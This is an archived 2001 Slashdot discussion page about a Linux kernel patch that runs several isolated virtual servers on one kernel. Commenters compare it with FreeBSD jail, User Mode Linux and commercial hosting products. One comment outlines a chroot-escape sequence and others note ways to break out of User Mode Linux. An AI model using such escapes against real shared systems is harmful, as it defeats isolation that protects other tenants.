Become a fan of Slashdot on Facebook

 



Forgot your password?
typodupeerror
×
Linux Software

One-Machine Linux Cluster 260

An AC wrote: Forget Beowulf ? clusters, Jacques Gelinas has made available a kernel patch to enable many virtual servers running on the same machine, even the same kernel. Read his original message posted to the Linux kernel list." Imagine what this will mean for hosting companies...
This discussion has been archived. No new comments can be posted.

One-Machine Linux Cluster

Comments Filter:
  • by havardi ( 122062 ) on Wednesday November 07, 2001 @01:08AM (#2531355)
    haha.. better read the fine print and make sure you actuallu get your own *computer* including box and powersuppy, and motherboard-- or you may end up sharing your box with 100 other ppl :-P
  • *BSD Jail? (Score:2, Insightful)

    Isn't this like the BDSs jail() syscall?
  • As far as i know... this was supposed to be one of the big wins for the mainframes... i recall some note about 44000 linuxes running together on a single IBM mainframe? sorry dont have the link handy...
  • Beowulf clusters of virtual Beowulf clusters of virtual Beowulf clusters.

    On a more serious note, though, this still does not give you the advantages a dedicated server does. You do not have the dedicated *hardware* resources and it is likely much slower than just going the "chroot route" (due to all of these virtual machines on one server...)
  • Very Useful (Score:5, Insightful)

    by Gregg Alan ( 8487 ) on Wednesday November 07, 2001 @01:12AM (#2531374)
    Slashdotted before I could read the whole thing. :( But, as a sysadmin for a smallish web devolopment/hosting company I could REALLY use some separation between certain clients. Sure, this isn't ready for production systems but one day it may be.

    The patcher is right...modern CPUs (for my industry) have PLENTY of power. What I hate is having to run some third party app for a client (even in a Linux environment) that *might* affect the whole machine. This patch holds the promise that I won't have as much to worry about.

    Yes, this is a good thing.
    • Re:Very Useful (Score:2, Informative)

      by btellier ( 126120 )
      What I hate is having to run some third party app for a client (even in a Linux environment) that *might* affect the whole machine.

      If this is your problem you're not running the right apps. For modern production machines the problem is usually running Exchange/Sendmail instead of Qmail or MSDNS instead of DJBDNS (OK, maybe i'm partial to DJ Bernstein's apps). The only thing you might overload on is web servers, and if you're running Apache you've got such good code behind you that your CPU is probably the bottleneck.

      The answer for production servers is not "seperation between clients" but rather choosing apps which are efficient. Name any app likely to be run on a high traffic machine and I can give you a specific UN*X app which will do it with very little waste.

    • Processor power aside, Imagine running 6-12 V-linux machines on that cheap 2 processor P-III.

      you can easily run 12 websites on a SMP P-III 866 and if each boots off of seperate partitions (or even seperate SCSI drives for more seperation!) that would rock.

      The only problem I see is that User C can rob processor time from Users A and B by simply recompiling the Kernel with a make -J2

      I wonder what plans are in the future to eliminate machine A from mounting Machine B's hard drive partitions or Sniffing the ethernet traffic or even dumping the contents of memory.
    • Whole heartedly agree. It would also perforctly cover the market between colocation and virtual web hosting.

      Currently, the only choices we have are colocation and virtual web server hosting. colocation is way too expensive, and virtual hosting does not offer enough flexibility. It's hard to get any services that are not offered as part of the hosting company's smorgasboard.

      Virtual hosts like this would be perfect for tinkerers who can build all the stuff by themselves, without having to fork out for a rackmount server, precious rack space, and expensive colo fees.
  • by Anonymous Coward
    Here [sourceforge.net] is another project that just turns the kernel into another runnable process. You need to have a filesystem for it to mount and run with (available at the site) and from there you can have it run just about everything you can under the main host (within reason). It can be totally isolated, networked, and/or use its own hostfs to read directly from the host system's directory tree.
  • by inhalent ( 88094 ) on Wednesday November 07, 2001 @01:15AM (#2531383) Homepage
    Basically the same idea as Galaxy. Check it out for ideas.... http://www.openvms.compaq.com/availability/galaxy. html
  • by Ekman ( 60679 )
    It's nice to see Linux finally catching up. FreeBSD has had this functionality for over a year and a half.

    Take a look at the jail(8) [freebsd.org] and jail(2) [freebsd.org] manapges.


    • Jail isn't the same as this. If you read the jail manpages, it gives lots of examples how running with a jail involves very interesting problems for some uses. This different technique has different problems for other uses, and does some things nicely that jail does not. And user mode Linux is different, and better for yet other purposes.
  • by Genady ( 27988 ) <(moc.cam) (ta) (sregor.yrag)> on Wednesday November 07, 2001 @01:19AM (#2531396)
    This has just about zero to do with clustering, if anything this is the opposite of clustering. However this IS very very interesting for Web Hosts and just about anyone else that wants to create and maintain multiple environments for developement, test, etc. Image, being able to carve up a mid-range machine like you can an S390 (or other Mainframe class machine Like Sun's E10/15K). So suppose IBM takes this an runs with it. Linux is already ported to RS/6000 and AS/400, now you could get 8 processors of RS/6000 goodness, run production on 4 processors, Test on 2 processors, and Dev on 2 processors.

    The devil will be in how you refresh test and dev from production, but that can probably be done inside Logical Volume Manager.

    This is very very cool stuff it will be very ineresting to see how it stacks up against the big boys in Virtual machine space.
    • Just to clarify a little, Sun E10/15k's are not directly comparable in the way multiple servers run in the same chassis. If you were to combine all of the system boards in an E10/15k and then run virtual servers in a single copy of Solaris (I'm not aware of anything that allows you to do this) then it would be comparable.

      The way most E10/15 installations are used is to split the chassis, which supplies redundant power, management bus (JTAG) and a centreplane configuration for data and address buses, among several system boards. Each combination of system boards is used to run a completely separate OS installation. Even the data and address busses are physically separated from each other, rather than logically as in the article or an S390. It is a very rare error that will take the entire chassis down, providing superior uptimes. For the article, if there was a data or address bus error for one virtual machine, all of them would be affected, since it's the same physical hardware. This is not the case for an E10/15k.

      You could, theoretically, split one chassis into lots of system boards and run lots of Solaris instances in a cluster, but that wouldn't be nearly as powerful as putting all the boards into a dirty big SMP Solaris instance. Solaris SMP is pretty darn cool, IMHO.

    • by Doktor Memory ( 237313 ) on Wednesday November 07, 2001 @02:10AM (#2531480) Journal
      now you could get 8 processors of RS/6000 goodness, run production on 4 processors, Test on 2 processors, and Dev on 2 processors.

      What you're suggesting is pretty much the opposite of how this package works. As the author himself states, you cannot dedicate hardware resources to a vserver. Only one kernel is ever running, and you use all of your cpus or none. Process- and user-space isolation is provided, but if a process in one vserver tickles a kernel bug that crashes the system, the whole ball of wax will come down with that vserver. (Likewise, it's very likely that a kernel-level root exploit will allow you to break out of the vserver and attack the whole system.)

      Essentially, vserver is to the process space what chroot is to the filesystem layer.

      This is not inherantly better or worse than the "system partitioning" approach; it's just a different approach, and will have different uses.
      • Hardware isolation (Score:3, Informative)

        by TBone ( 5692 )
        Yes, the patch doesn't support hardware dedication. But my SUN background makes me ponder a line of thought.

        In Solaris, there are the psr* family of commands for processor administration. psradmin -f 0 will turn off processor 0. As long as this isn't physical powering down of processors, and simply instructions to the scheduler to disregard p0, you could, on the above vm, do something like:

        Prod: psradm -f 4,5,6,7
        Test: psradm -f 0,1,2,3,6,7
        Dev: psradm -f 0,1,2,3,4,5

        Leaving procs 0-3 for Prod, 4-5 for Test, and 6-7 for Dev.

        Along the same lines, at boot time you can explicitly state memory ranges to the kernel, if linux can't detect your memory right, or you have known bad memory you want to avoid. With the same thought, the Prod, Test, and Dev kernels can be brought up explicitly stating the 0-2G, 2-3G, and 3-4G ranges as usable memory addresses.

        You run into more problems when it comes to peripherals in the box, but how many serial ports do you really need? Just specify ttyS0 in the VM with the addresses of ttyS0,1,2 of the physical server.

        Am I smoking crack, or should I just stick with my much-more-hardware-flexible Sparc architecture :)
        • In Solaris, there are the psr* family of commands for processor administration. psradmin -f 0 will turn off processor 0. As long as this isn't physical powering down of processors, and simply instructions to the scheduler to disregard p0, you could, on the above vm, do something like:

          Prod: psradm -f 4,5,6,7
          Test: psradm -f 0,1,2,3,6,7
          Dev: psradm -f 0,1,2,3,4,5

          Leaving procs 0-3 for Prod, 4-5 for Test, and 6-7 for Dev.

          I don't think that this could work with the vserver patches as they are currently implemented. There is still only one kernel and (important bit here) one scheduler running: so all of your assorted vservers will run on the total number of procs aloted to the scheduler.

          You might be able to hack up some sort of "vpsradm" command that instructed the scheduler to never assign processes from a certain vserver to a certain processor, but I suspect that such a thing is a lot easier to theorize about than to actually implement. (Actual kernel hackers are encouraged to add their two cents here.)
    • Like most Slashdot posters, you obviously didn't read the documentation before posting. On an 8-processor machine, this patch will give you 8 processors for each virtual server; it does /not/ implement CPU partitioning and explains the difference in the documentation.

      Also the main server can see all the files in the virtual servers since it isn't chrooted.

    • IBM is already running 15000+ linux servers (seperate kernel and all) on a single iron ..

  • by josquint ( 193951 ) on Wednesday November 07, 2001 @01:19AM (#2531397) Homepage
    ... of clustering. Its... slicing your box up...
  • Why ask why? (Score:1, Redundant)

    by Mdog ( 25508 )
    I am displeased to see so many of you people replying and asking why this would be a good idea.

    The point is that this is *l337*. *That* is the point.

    If there happens to be a practical application, that is completely secondary. :)

    • I am displeased to see so many of you people replying and asking why this would be a good idea.
      The point is that this is *l337*. *That* is the point.

      Somehow I'm sure I could find a similar phrase in a "famous last words" collection somewhere ;-)

  • Is it similar to this (commercial, closed source) package [ensim.com] for redhat?

    I believe this package is very popular with webhosts. One user can totally hose the machine, the rest are not impacted. Trust me, I know.

  • User Mode Linux? (Score:4, Informative)

    by jmv ( 93421 ) on Wednesday November 07, 2001 @01:23AM (#2531414) Homepage
    Can anyone tell me how this is different than User Mode Linux [sourceforge.net]?
    • Re:User Mode Linux? (Score:4, Informative)

      by dispari ( 457014 ) <`moc.emoh' `ta' `1iodahs'> on Wednesday November 07, 2001 @02:07AM (#2531474)
      User Mode Linux is basically a VM. It uses virtual devices for hardware multiplexing. Read the "Alternative technolgoies/Virtual Machines" and "Alternative technologies/Limitations of those technologies" for why this is a different (and better in some instances) solution.

      The vunify tool has significance when differentiating between VM's and this.
    • by Florian Weimer ( 88405 ) <fw@deneb.enyo.de> on Wednesday November 07, 2001 @02:31AM (#2531524) Homepage
      At the moment, User Mode Linux does separate the processes in a VM from the host system. That's because the kernel image itself is writable for the processes running in a UML virtual machine, which means that processes can break out of the virtual machine pretty easily and gain access to the account running UML on the host system. In addition, even if this is corrected (perhaps it has been during the last few weeks, I haven't checked), the kernel memory would still be read-only for the processes run by it, so different processes in the virtual machine could snoop each other. This means that User Mode Linux is great for testing stuff, but it only moderately increases security.

      The patches for compartmentalization which mimic FreeBSD's jail(8) feature are completely different. If they are done properly (and checking this will require some time), they can provide complete separation of the processes running in different compartments. Performance is probably a bit better, too, because only one kernel is running, and not a stack of two.

      Again, if you need compartmentalization now, and you have security concerns, you should either use FreeBSD, or GNU/Linux on S/390. This new kernel feature will need a bit of time to settle down and work correctly (from a security point of view).
    • Chroot jails have their problems an annoyances. I've been toying around for a bit with the idea of using User Mode Linux as a security sandbox. This cluster-on-one-system looks even better, and a sibling comment to this one indicates that maybe User Mode isn't a safe jail, anyway.

      Not having enough of a home DP Center to dedicate one box for a firewall, I end up running local services (properly configured for local ONLY access in addition to firewalled for local only) on the same machine. I think I've done a good job, but there's always that nagging doubt. Putting my local services in a -safe- virtual OS would give me an additional level of comfort. Chroot jails are ok for standalone things like BIND, but once you have several services interacting like a mail system, it gets a bit messy.
  • by Ghostx13 ( 255828 ) on Wednesday November 07, 2001 @01:27AM (#2531426)
    Hostpro, now Interland has this sort of thing for freeBSD. It used to be called vserver. The new improved version is called Freedom. It's been out for years.
    • hostpro/vserver/vservers.. all the same thing. Now they have their own stuff systems, but they just used to be resellers for iServer [iserver.com] (now viaverio [viaverio.com].

      Right now, my site [cheathouse.com] and a friends [systemvelocity.com] is each running on a Free/BSD split with about 10 other users - it's a virtual server, and I can install/do anything I feel like on it. I get:

      > FreeBSD 4.2-RELEASE (VKERN)
      and
      > BSDI BSD/OS 3.1 Virtual Kernel #17
      (they are discontinuing BSD, afaik)
  • This concept is not new... A project known as FreeVSD has been in production for a while now.
    The software is released under the GPL, and is striving to be the most advanced and finely tuned web hosting system available.

    More information can be found here:
    http://www.freevsd.org/
  • mosix (Score:5, Interesting)

    by morcheeba ( 260908 ) on Wednesday November 07, 2001 @01:31AM (#2531430) Journal
    I wonder how this would work with mosix [mosix.com]... it could be a dream system!

    You could use mosix to combine the compute resources of several boxes to look like one box. And then, you could use this divy up the space so that people don't step on each other. When anyone (working in thier own space) kicks off a large compile, the load would transparently be distributed among all the boxen.

    Of course, I have zippy experience with any of this, but it sounds possible.
    • I have a gut feeling that there would be a significant amount of work necessary before this would be feasible. As cool as it may be, it is absolutely essential that either network memory or some sort of uber-slick inter-virtual-server communication about necessary and future memory requirements, as well as super-slick process movements, be hashed out.

      If you have N machines and greater than N users, it's probably better to install a batch system. There is already a shitload of flexibility in the _current_ UNIX environment especially WRT linking together of multiple machines. No need to mess with the absolute barebones with two patches, eh?
    • Compaq recently announced that they are working on Single System Image clustering for Linux, which does make several boxes look like one - same PID space, shared IP addresses, shared memory, shared devices and filesystem etc.
      • hmm,

        plan9 is a distributed architecture.
        you don't need one pid space, that all sounds terribly over complicated

        On plan9 you can happily debug code running on any of MIPS, SPARC, Motorola 68020, Intel 386 on any other plan9 box (permissions granted of course).

        Multi-threading isn't the only way to build a big application.
  • i use an "appliance server" at mediatemple.net [mediatemple.net] that uses the same sort of thing. just a small, isolated linux os on a shared box. works great! i'm fairly sure they use technology developed by ensim. [ensim.com] read up on it here. [ensim.com] nice to see this made available elsewhere though...
  • by L-Wave ( 515413 )
    what would happen if you ran a fork bomb on one of the virtual servers? would it bring the whole physical machine down or just the virtual machine?
  • This is... (Score:1, Insightful)

    by keepper ( 24317 )


    EXACTLY what the FreeBSD jail() call does...

    Basically chroot on steroids...

    Well, it is good the linux crowd took such
    a good idea over.. if now only they would take
    the concepts of having three branches ( RELEASE,STABLE,CURRENT) to the kernel...

    On another note though.... with linux's history of root kit's, ths is certainly something i would not use for a commercial offering...

    • by Anonymous Coward
      if now only they would take

      the concepts of having three branches ( RELEASE,STABLE,CURRENT) to the kernel...


      (2.0, 2.2, 2.4)
    • Re:This is... (Score:2, Informative)

      by psamuels ( 64397 )
      EXACTLY what the FreeBSD jail() call does...

      And you can do most of the same in Linux, with good old-fashioned chroot plus capabilities. No need for a separate system call.


      Restricting to a specific IP address is a nice touch, and one thing Linux capabilities can't do, but it seems rather application-specific. It only allows one IP alias to the jailed process, and doesn't seem to cover any non-IPv4 addressing. And WTF do you have to specify a hostname? The kernel needs this information? (Or does the (2) in jail(2) not actually mean it's a syscall, like it doesn't in AIX?)


      I'm also not sure if Linux capabilities are fine-grained enough to keep root from escaping a chroot without totally crippling it - but then again, jail() seems pretty crippling too. A virtual host server really shouldn't need root privs, other than bind-to-low-ports, and Linux capabilities do have that granularity.

  • This is pretty sad.
    Firstly, you're an idiot if you still haven't realized staff comments aren't in italics.

    Secondly, Beowulf clusters were only mentioned because they are the complete opposite of the subject matter:

    Beowulf clusters bring the computing power of several computers together for a single task, whereas with this a single computer could be used for several isolated tasks.

    Some of you should hand over your geek badges, right now.

  • IBM has been doing this for some time [ibm.com] on their mainframes, where it actually makes sense because of the massive amounts of processing power.
    • by KMSelf ( 361 ) <karsten@linuxmafia.com> on Wednesday November 07, 2001 @05:08AM (#2531726) Homepage

      It's the control over it.

      Mainframes have insane amounts of control over user processes (a Linux image essentially becomes same), as well as the ability to allocate more resources, fewer, provide fine-grained process accounting, shut down processes, migrate them elsewhere (part of the IBM dataceter Linux concept is the ability to migrate nodes around the country as needed).

      What a mainframe doesn't have to offfer is insane amounts of processor power or memory. Disk, and disk I/O are quite another matter -- the amount of aggregate bandwidth a z390 has to offer is impressive.

      PC-based virtualization clearly has some advantages, through not all of those offered by a mainframe. A rack of virtualized PCs probably does offer a higher processor density than the equivalent mainframe, however.

  • Think about a system where you want to use IP filter to control what a network host/ports a service (or the hacker that has cracked your service) accesses.

    If it addresses many of the issues that normal chroot has, then it may be good.

    Isolation of applications against each other.

    It's going to be intresting to see how much overhead this has when compared to vmware, usermode linux, or just chroots. (Tried 'em all).

    If the overhead of this is not higher than chroot then it will be a big win.
  • I could be mistaken here, but it is my impression that any user can spin off a virtual machine.

    What happens in the following scenario:

    A user spins off a vserver, specifying the IP address of the default gateway for the parent server. The user then somehow convinces the parent server that it really *is* the gateway, and effectively takes the parent server off the network. If this is possible, someone without physical access to the network, but with an unpriviledged login to the parent server, could effectively perform a DOS attack on it.

    I must be missing something here. It can't be this simple. Can anyone point out where I've gone wrong?
  • Co-location is kinda pricey, but use linux enabled with domains, and you could split the cost with other people. Then nobody has to bitch about ROOT access. If I ran a small ISP, I could offer linux domains for cheap, virtual servers. If someone messed up a domain, just restore from the nightly backup and they are up and running. Get a couple dual proc boxes, with dual nics (inet/nfs+backup), and a 60 gig (raided?). Make 2 gigs per domain, and NFS mount the /home dirs on some nas. If you could get the backups working, where handling domains are like files, just copy and go, this could be some powerful tool for the busy admin.
    -
    Sometimes I've believed as many as six impossible things before breakfast. -Lewis Carroll (1832 - 1898)
  • -May run various network services, binding to the same ports without special configuration.


    What!?!? What happens when you bind, say, sshd to port 22 on multiple servers? Do you also need multiple ethernet cards and ip addresses? The docs don't say anything about that...
  • When we upgrade databases, we assign a dedicated server because we dont want to use the all the cpu horsepower. If we ran a linux with virtual domains, we could upgrade on the same box and not use up all the resources, and the box could stay in production. Thou the article said there is a draw back on a shared file system, allow some kind of snapshots of file systems and you could make a very powerful combination. If you could move a snapshot file system to a domain, you could test, upgrade, whatever. Interesting idea.

    BTW, if you have a Sun StarFire with domains plugged into an EMC terabyte storage, you spent millions to do just that!
  • I don't really know how they do it, but a number of hosting companies offer VPSs -- like 32 virtual computers hosted with one computer. I have an account like this myself, and it's a fairly economical way to get a very flexible host.

    It seems like this is the same kind of thing this person is talking about...? Is this more general in some way? What exactly is my host using anyway?

  • Security flaws (Score:2, Interesting)

    by BuGless ( 31232 )
    Having these calls available to non-root opens up a can of worms. The system provided looks clean, except he should limit its execution with yet another capability.
  • by the frizz ( 242326 ) on Wednesday November 07, 2001 @03:58AM (#2531641)
    My particular interest was to find virtual hosting solutions that would (1) not allow one runaway virtual server to deny the others of at least a predefined minimum level of CPU, RAM and I/O (disk and network) resources and (2) give any one virtual server extra resources if they were available. From my reading of other slashdotter's posting and the info on the web I've summarized below the various virtual server hosting solutions mentioned. Someone who actually has used these products should actually correct me.

    Linux can natively be configured to enforce disk quotas and (with more difficulty) [linuxdoc.org] manage network bandwidth [linuxjournal.com] without any special virtual server software. Also the native unix process scheduling algorithm does reduce the priority of CPU bound tasks. The getrlimit(2) system call can be used to set various limits per process (not per virtual server unless the virtual server runs as one process I guess.) I know of no way to specifically limit disk bandwidth on Linux.

    Freeware such as s_context [solucorp.qc.ca] and user mode linux [sourceforge.net] provide no control over how much resources one virtual server gets over another besides disk usage. Other limited resources like CPU, disk and network bandwidth (RAM?) are shared just like they would be shared by separate processes under a single Linux system.

    FreeVSD [freevsd.org] is not a virtual server, but a collection of scripts, binaries and multiple copies of hard-linked read-only filesystems for the common system environment. It is has the best chance for winning the total performance award but has no extra features for resource limits between systems.

    True virtual machines. (E.g., vmware [vmware.com]) provide very good isolation, but this leads to little sharing of excess unused resources between virtual servers I believe. They also have poorer performance in general because so much emulation is done.

    The commercial, proprietary Private Server [ensim.com] product from Ensim [ensim.com] seems good from the marketing blurbs which say that they have "their own guaranteed share of the servers resources, including CPU, memory and bandwidth". I wonder what the performance penalty for this is and how much does it cost? Can anyone comment?

    • Freeware such as s_context and user mode linux provide no control over how much resources one virtual server gets over another besides disk usage. Other limited resources like CPU, disk and network bandwidth (RAM?) are shared just like they would be shared by separate processes under a single Linux system.
      Yup, you're right. But you can cap individual users in the main system. User Bob could be limited to $X% processor usage, etc. He's still root of his machine once he changes context though. Run as a script at boot before allowing him to log in, and his virtual machine is capped. I'm really liking the sound of this.
    • and user mode linux [sourceforge.net] provide no control over how much resources one virtual server gets over another besides disk usage

      That's wrong, you can specify RAM allocation in UML.
  • There is an article (spanish only) commenting this kernel feature here:

    http://www.hispacluster.org/modules.php?op=modload &name=Sections&file=index&req=viewarticle&artid=2 [hispacluster.org].

    In fact, this article was generated collecting the opinions of many users who post comments about this topic.

    I hope it could give you some ideas about the implication of this important feature in the Linux future.
  • by mubes ( 115026 ) on Wednesday November 07, 2001 @05:15AM (#2531736) Homepage
    Much respect to this guy. He's taken something thats big, hairy and complex and looked at it from a different direction. Because he's got access to the source he's been able to do something novel with it in what appears to be an efficient and simple way...you couldn't do that with any of the closed source OSes out there today!

    The beauty of this is that there's *one* kernel running so, apart from any overhead of selecting the environment, you pretty much get the same performance as running native. This has got to have 1001 applications.

    One of the things I'd personally like to see is some kind of overlaid filesystem so each image by default gets /bin /lib etc. from a generic set but users can modify them if they need to - this would allow a sysadmin to keep the default system current while not preventing 'owners' of an individual image from being able to change things if they need to....I vaguely remember something like this for CDs - anyone got the details? Time for a bit of experimentation ;-)
  • by kris ( 824 ) <kris-slashdot@koehntopp.de> on Wednesday November 07, 2001 @07:40AM (#2531970) Homepage
    I wonder if it would be practical to associate absolute CPU time limits or CPU usage percentages with a security context id in order to prevent a certain security context from hogging all CPU ressources.

    A similar thing would be desireable for resident set size (real RAM usage) and virtual size (process size) per security context.
  • It's called.. (Score:2, Insightful)

    Jail SYNOPSIS jail path hostname ip-number command ... DESCRIPTION The jail command imprisons a process and all future descendants. Please see the jail(2) man page for further details. .... .... FreeBSD 4.4 April 28, 1999
  • by noz ( 253073 )

    Forget arguing about the definition of a 'cluster'. This is the technology that differentiates between PCs, servers, and mainframes.

    IBM and Unisys mainframes (perhaps others, I've worked with these) have hardware partitions where CPUs are divided up. Linux is there now too.

  • chroot safe? (Score:2, Interesting)

    by tal197 ( 144614 )
    The documentation says...


    Unix and Linux have always had the chroot() system call. This call was used to trap a process into a sub-directory. After the system-call, the process is led to believe that the sub-directory is now the root directory. This system call can't be reversed. In fact, the only thing a process can do is trap itself further and further in the file-system (calling chroot() again).

    And...

    The vserver is trapped into a sub-directory of the main server and can't escape. This is done by the standard chroot() system call found on all Unix and Linux boxes.


    But, I thought you couldn't (safely) run root processes in a chroot jail, because escape is easy if you can call chroot? Eg, create a subdirectory in your jail and chroot to that (keeping the same current directory), then chroot("../../../../") to get out of jail. Is it really safe to give someone the root password to a vserver in this system?

  • Could this be used to give every remotely downloaded app a virtual machine, sort of like a java VM? As an advantage to java, with IPv6, you could give every app its own class C network off your 1 billion IP block.
  • Another use that hasn't been mentioned here is testing your failover systems. Now, instead of buying two machines, you can buy one and simulate crashes to test the failover. Very useful stuff.

    Note: for most packages there are ways to do this anyway, but they can become a PITA.
  • by ncon ( 159906 )
    This is much like the jail() of BSD. This does not give any of the benefits of a clustering arrangement. That is, the benefit of having a cluster is that you can distribute process across multiple machines and run from a common storage server. Although this technology is very useful (and can be applied in all sorts of ways- We run Bind in a jail) it does not provide extra process space if only running on one machine.

    Having sufficient RAM is the largest factor in commodity grade webhosting services, so having mutlitple instances of a cluster on the same machine does not really make sense, when the whole point of a cluster is to give faster computation and access time.

    btw- we offer both of these services here [imeme.net], and we do it on FreeBSD [freebsd.org].
  • Sun has machines entirely built around the concept of virtual hosts. Of course, they stole the idea from the mainframe world, where this has been going on for decades. I don't know of any systems that currently allow splitting a single CPU between domains, but I honestly don't see it as much of a benefit.

    Which is definitely not to say that it's a bad or late thing--it's nice to see Linux playing with the Big Boys (tm) now and again. Just don't think that it's ground-breaking technology.

  • During the course of my job, I have to recreate customer environments to duplicate their problems. Often these environments involve firewalls, NAT, or simply multiple subnets that are difficult and time-consuming to get past our IT guys (and even once we convince them of the need, it may be a week before any real progress is made on their end to set things up).

    However, using this, I can hopefully get a single box set up with several "systems" using internal virtual networks that will allow me to have something like...

    1: Server / Client Gateway
    2: Client

    3: Firewall / NAT / Router

    4: Client Gateway
    5: Client

    With 1 and 2 being "inside" the firewall and 4 and 5 being "outside".

    This would allow me to eliminate TONS of bureaucratic red-tape paperwork BS, and give a self-contained environment for some of my other coworkers to educate themselves on (95% of which have never done any actual hands-on work with a firewall or even done any routing).

    While all this could be easily accomplished using a multi-processor Sun box and their domain / partitioning scheme, those tend to be a little more pricey than the dual-P2 I've already got sitting idle in the corner of my office...

    Any comments on the feasibility of this scenario?

    Would this package work for what I'd like to do?

    Thanks...

    -l
  • How does this compare to both
    umlinux (I suspect this is not what's going on)
    and
    freevsd (Check it out)
    http://www.freevsd.org
  • Some extremely large, well known hosting companies have trouble providing "reasonable" (trustworthy, timely, competent) support to corporate website virtual hosting clients, and I have repeatedly seen all hell break loose in the case of deadlines to push staging to live server from many time zones away.. for some reason I still don't understand, we were never allowed to touch the live server so we never even knew its directoy contents. Sheer hell. In this situation you seldom know if it's going to work on the live server (which is *not* the same as staging no matter what was promised) until D-Day.

    I was even offered root access once to fix this provider's host but I had to refuse due to responsibility for all the other clients with virtual websites. The problems generally do not come from things that would crash a kernel, but from the economics of getting individuals to apply appropriate knowledge in the right place at the right time, within the context of a number of companies working together with their own agendas.

    Using this virtual server patch, I can see a *lot* of time, effort, danger, stress, complaints, etc. all swept away into history!

    Run a virtual servers on your local dev box and the remote staging and live machines, then use rsync from local to staging. Ssh into staging and rsync again, or have the admin staff do so. But the live machine can be isolated network-wise, so it is more likely that the user could be allowed onto the live server themselves.

    Of course, 1) it isn't a real compartment with your own filesystem and everything, so for example installing Perl modules, tweaking boot scripts, or tweaking security ain't happening. 2) it isn't strong compartmentalization. And 3) you have to be running a linux kernel in the first place. And 4) the above problems tend to involve Suns, not linux boxes.

    Seems this kind of idea is killer though. It would be really interesting if we could run something like this or (maybe better yet) user-mode-linux efficiently as a process inside a SunOS environment. Sounds like IBM had the right idea running a bunch of complete OS images on their heavy iron.

Where there's a will, there's a relative.

Working...